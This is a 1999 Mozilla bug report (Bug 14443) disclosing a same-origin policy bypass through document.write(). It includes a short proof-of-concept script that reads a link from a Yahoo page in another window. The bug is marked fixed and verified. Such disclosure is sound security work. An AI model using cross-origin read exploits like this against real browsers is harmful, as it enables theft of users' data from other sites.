Closed
Bug 14443
Opened 25 years ago
Closed 25 years ago
"Same origin" security policy may be circumvented using document.write()
Categories
(Core :: Security, defect, P3)
VERIFIED
FIXED
People
(Reporter: joro, Assigned: norrisboyd)
On builds 1999092013 and 1999091914 "Same origin" security may be circumvented using document.write(). I have made a demonstration that reads links from documents from another domain, I am pretty sure access to other elements may be done. The code that reads links from Yahoo is:
--------------------------------------
<SCRIPT>
a=window.open("http://www.yahoo.com","a");
setTimeout('a.document.open();a.document.write("<SCRIPT>b=window.open(\'http://www.yahoo.com\');s=\'Here is the first link from Yahoo: \';setTimeout(\'alert(s+b.document.links[0].href)\',20000);</"+"SCRIPT>");a.document.close();',20000);
</SCRIPT>
--------------------------------------
Demonstration is available at: http://www.nat.bg/~joro/mozilla/links1.html
Assignee
Updated • 25 years ago
Status: NEW → ASSIGNED
Assignee
Updated • 25 years ago
Status: ASSIGNED → RESOLVED
Closed: 25 years ago
Resolution: --- → FIXED
Windows NT 1999120208 Comm Verified ...'[Exception... "Security error"'...
Bulk moving all Browser Security bugs to new Security: General component. The previous Security component for Browser will be deleted.
Component: Security → Security: General